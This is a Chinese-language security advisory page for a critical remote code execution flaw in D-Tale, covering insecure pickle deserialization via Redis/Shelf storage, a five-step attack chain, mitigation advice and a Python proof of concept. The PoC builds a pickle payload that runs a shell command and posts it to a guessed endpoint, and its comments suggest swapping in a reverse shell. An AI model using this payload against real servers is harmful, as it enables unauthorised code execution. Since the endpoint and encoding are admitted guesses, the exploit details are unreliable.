CVE-2026-35052 CVSS 9.8 严重

CVE-2026-35052 D-Tale 远程代码执行漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35052

漏洞类型

远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Tale

漏洞概述

D-Tale是一个由Flask后端和React前端组成的数据分析工具。在3.22.0版本之前，若公开托管并使用redis或shelf存储层，攻击者可利用该漏洞在服务器上远程执行任意代码。该漏洞无需认证且无用户交互，危害极高，官方已在3.22.0版本中修复此问题。

技术细节

该漏洞的核心在于D-Tale在特定存储层配置下的不安全数据处理机制。当D-Tale（版本<3.22.0）配置使用Redis或Shelf作为后端存储时，未能对从存储层加载的数据对象进行严格的类型校验或安全的反序列化操作。攻击者可以通过网络向公开的D-Tale实例发送特制的恶意请求，注入包含恶意代码的数据对象（通常是Python的Pickle对象）。当Flask后端尝试从Redis或Shelf读取并处理这些数据时，会触发反序列化过程，从而导致恶意代码在服务器上下文中被执行。由于CVSS向量显示无需认证（PR:N）且无用户交互（UI:N），攻击者可轻易利用此漏洞完全控制受影响的服务器，造成数据泄露、篡改或服务中断。

攻击链分析

STEP 1

侦察

攻击者扫描互联网，寻找公开托管的D-Tale实例，特别是使用了Redis或Shelf存储层的服务。

STEP 2

武器化

攻击者构造包含恶意代码的Python Pickle对象，该对象在反序列化时会触发代码执行。

STEP 3

投递

攻击者通过HTTP请求将恶意数据发送到D-Tale的API接口，数据随后被写入后端存储。

STEP 4

利用

D-Tale后端服务从Redis或Shelf读取数据并尝试反序列化，触发漏洞，执行攻击者的代码。

STEP 5

行动

攻击者在服务器上获得Shell权限，进而进行数据窃取、横向移动或部署勒索软件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import pickle
import base64

# Proof of Concept for CVE-2026-35052
# Description: Exploits insecure deserialization in D-Tale using Redis/Shelf storage.

# Target configuration
TARGET_URL = "http://vulnerable-d-tale-host:40000"

# Define malicious payload (e.g., command execution)
class MaliciousPayload:
    def __reduce__(self):
        # Command to execute (e.g., creating a file or reverse shell)
        import os
        return (os.system, ('touch /tmp/pwned',))

# Serialize the payload using pickle
serialized_data = pickle.dumps(MaliciousPayload())

# Encode if necessary (depending on API implementation)
# Assuming the API accepts base64 encoded data for storage
encoded_payload = base64.b64encode(serialized_data).decode('utf-8')

# Construct the malicious request
# Note: The exact endpoint might vary based on D-Tale configuration
endpoint = f"{TARGET_URL}/dtale/process-data"

headers = {
    "Content-Type": "application/json"
}

# Payload structure simulating data sent to the storage layer
payload_json = {
    "data_id": "exploit_test",
    "data": encoded_payload,
    "store_type": "redis" # Explicitly targeting vulnerable storage
}

try:
    print("Sending malicious payload to target...")
    response = requests.post(endpoint, json=payload_json, headers=headers, timeout=5)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check if command executed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error during exploitation: {e}")

影响范围

D-Tale < 3.22.0

防御指南

临时缓解措施

如果无法立即升级，请限制对D-Tale应用端口的网络访问，仅允许可信的IP地址连接。同时，监控服务器进程和系统日志，查找异常的Python进程执行或可疑的文件操作。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表